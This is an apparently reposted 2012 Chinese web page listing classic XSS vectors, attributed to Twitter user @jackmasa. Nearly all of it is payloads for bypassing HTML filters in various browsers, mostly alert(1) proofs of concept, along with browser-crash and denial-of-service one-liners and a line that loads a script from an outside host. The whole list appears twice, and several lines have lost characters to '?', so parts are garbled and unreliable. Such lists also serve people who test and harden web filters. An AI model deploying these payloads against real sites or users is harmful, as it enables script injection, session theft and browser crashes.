一些經(jīng)典的XSS跨站代碼整理
發(fā)布時(shí)間:2012-07-06 17:02:45 作者:佚名
我要評論

一些經(jīng)典的XSS跨站代碼整理
<!-- " --!><input value="><img src=xx:x onerror=alert(1)//">
<script/onload=alert(1)></script> IE9
<style/onload=alert(1)>
alert([0x0D]-->[0x0D]1<!--[0x0D])
1<!--i
document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8
JSON.parse('{"__proto__":["a",1]}')
location++
IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog
<svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera
Function('alert(arguments.callee.caller)')()
firefox dos? while(1)find();
<div/style=x:expression(alert(URL=1))>
Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode!
<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector
<svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~
<body/onload=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>
vbs:alert+-[]
<body/onload=vbs::::::::alert----+--+----1:::::::::>
Firefox vector <math><a xlink:href="//mmme.me">click
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>
Inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss
[code]Webkit X-XSS-Protection header is enabled just now :P
<svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/
<?xml encoding="><svg/onload=alert(1)// >">
<a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE
Also <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a>
<h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> IE only
<1h name="<svg/onload=alert(1)>"></1h>
<img ="1 src=xxx:x onerror=alert(1)//" > works in not-IE
javascript=1;for(javascript in RuntimeObject());javascript=='javascript'
<body/onerror=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sanbox object
<img src='javascript:while([{}]);'> works in firefox
for(x in document.open); Crash your IE 6:>
localStorage.setItem('setItem',1)
Only to find '?'.toUpperCase()==='?'.toUpperCase()
J? H? T? W? Y? i? length==2
'?'.toUpperCase()=='I'
Also '?'.toUpperCase()=='SS'
'?.toUpperCase() =='FF'// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST
#Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-個(gè)-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>
Firefox always the most cute data:_,<script>alert(1)</script>
<a href="ftp:/baidu.com">xx</a>
http://?????????? works in Firefox
RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?
location='javascript:alert(1)'
for({} in {});
興味深いhttp://jsbin.com/inekab for Opera only
<a href=https:http://www.google.com>x</a> That's a relative path?
document.frames==window.frames
<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox
(0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D
127.0x000000001==127.0.0.1
<input value="sefewfewf"/> Chrome input value block
<svg><xmp><img/onerror=alert(1) src=xxx:x />
<img src/="><img src=xxx:x onerror=alert(1)//">
有趣的isindex <isindex formaction=javascript:alert(1) type=submit >
chrome:xx - >chrome://crash/ crash?
<form action=javascript:alert(1) /><input> Chrome input enter fucked!
<form/><button/><keygen/> chrome send empty key,is funny~_~
<form/><input/formaction=javascript:alert(1)> Because <form> not a void element.[/code
[code]<form><input/name="isindex"> when name are isindex does not send key.
<form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support .
<script language="php">echo 1 ?> Fascinating.
fvck:for(_?in?this)_['match'](/.Element$/)&&console.log(_)
location.reload('javascript:alert(1)') //ie only,lol~
{}alert(1)
Twitter @jackmasa =P
<script/onload=alert(1)></script> IE9
<style/onload=alert(1)>
alert([0x0D]-->[0x0D]1<!--[0x0D])
1<!--i
document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8
JSON.parse('{"__proto__":["a",1]}')
location++
IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog
<svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera
Function('alert(arguments.callee.caller)')()
firefox dos? while(1)find();
<div/style=x:expression(alert(URL=1))>
Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode!
<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector
<svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~
<body/onload=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>
vbs:alert+-[]
<body/onload=vbs::::::::alert----+--+----1:::::::::>
Firefox vector <math><a xlink:href="//mmme.me">click
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>
Inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss
[code]Webkit X-XSS-Protection header is enabled just now :P
<svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/
<?xml encoding="><svg/onload=alert(1)// >">
<a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE
Also <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a>
<h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> IE only
<1h name="<svg/onload=alert(1)>"></1h>
<img ="1 src=xxx:x onerror=alert(1)//" > works in not-IE
javascript=1;for(javascript in RuntimeObject());javascript=='javascript'
<body/onerror=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sanbox object
<img src='javascript:while([{}]);'> works in firefox
for(x in document.open); Crash your IE 6:>
localStorage.setItem('setItem',1)
Only to find '?'.toUpperCase()==='?'.toUpperCase()
J? H? T? W? Y? i? length==2
'?'.toUpperCase()=='I'
Also '?'.toUpperCase()=='SS'
'?.toUpperCase() =='FF'// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST
#Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-個(gè)-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>
Firefox always the most cute data:_,<script>alert(1)</script>
<a href="ftp:/baidu.com">xx</a>
http://?????????? works in Firefox
RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?
location='javascript:alert(1)'
for({} in {});
興味深いhttp://jsbin.com/inekab for Opera only
<a href=https:http://www.google.com>x</a> That's a relative path?
document.frames==window.frames
<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox
(0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D
127.0x000000001==127.0.0.1
<input value="sefewfewf"/> Chrome input value block
<svg><xmp><img/onerror=alert(1) src=xxx:x />
<img src/="><img src=xxx:x onerror=alert(1)//">
有趣的isindex <isindex formaction=javascript:alert(1) type=submit >
chrome:xx - >chrome://crash/ crash?
<form action=javascript:alert(1) /><input> Chrome input enter fucked!
<form/><button/><keygen/> chrome send empty key,is funny~_~
<form/><input/formaction=javascript:alert(1)> Because <form> not a void element.[/code
[code]<form><input/name="isindex"> when name are isindex does not send key.
<form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support .
<script language="php">echo 1 ?> Fascinating.
fvck:for(_?in?this)_['match'](/.Element$/)&&console.log(_)
location.reload('javascript:alert(1)') //ie only,lol~
{}alert(1)
Twitter @jackmasa =P
相關(guān)文章
關(guān)于DOM xss跨站的一點(diǎn)點(diǎn)經(jīng)驗(yàn)之談
Xss的危害各位小牛 大牛們都意識到了Xss開始的csrf和掛馬 到盜cookies和ajax 到xssshell 還有各種利用....2012-06-18- 今天在盛大云看到一個(gè)不錯(cuò)的防止ssh暴力破解的帖子,轉(zhuǎn)過來和大家分享下,主要是依靠denyhost軟件。穩(wěn)重所講的是下載安裝包安裝,實(shí)際上可以從直接使用yum或者apt安裝,找2012-09-04
關(guān)于星外虛擬機(jī)+D盾提權(quán)的艱難過程(圖)
本文主要介紹了星外虛擬機(jī)+D盾提權(quán)的主要過程2012-06-04網(wǎng)絡(luò)連接的本地連接右鍵菜單的修復(fù)命令
在網(wǎng)絡(luò)連接的本地連接右鍵菜單中有一個(gè)“修復(fù)”命令,我們平時(shí)可能很少用到。其實(shí)這個(gè)“修復(fù)”功能在某些時(shí)候可有不小的作用,下面就向大家介紹其兩個(gè)應(yīng)用。2009-07-22VISTA系統(tǒng)下如何啟動(dòng)及查看無線網(wǎng)絡(luò)配置
VISTA系統(tǒng)下啟動(dòng)及查看無線網(wǎng)絡(luò)配置的圖文教程2012-05-11- 分布式拒絕服務(wù)攻擊(DDoS)是目前黑客經(jīng)常采用而難以防范的攻擊手段。它的英文全稱為Distributed Denial of Service。2012-07-20
- 經(jīng)典高招打造自己的超級電腦防火墻網(wǎng)絡(luò)安全中談到個(gè)人上網(wǎng)時(shí)的安全,還是先把大家可能會(huì)遇到的問題歸個(gè)類吧。2011-02-27
- DDoS攻擊是利用一批受控制的機(jī)器向一臺機(jī)器發(fā)起攻擊,這樣來勢迅猛的攻擊令人難以防備,因此具有較大的破壞性2012-11-16
現(xiàn)代網(wǎng)絡(luò)性能監(jiān)控工具應(yīng)具備何種技能?網(wǎng)絡(luò)與應(yīng)用程序監(jiān)控
大家都知道現(xiàn)在市場上的網(wǎng)絡(luò)性能監(jiān)控工具大有所在,這為現(xiàn)在的IT行業(yè)的人員提供了很多便利,幫助IT管理團(tuán)隊(duì)監(jiān)控網(wǎng)絡(luò)性能,并且?guī)椭鶬T管理人員確定系統(tǒng)性能的瓶頸所在,進(jìn)而2016-10-19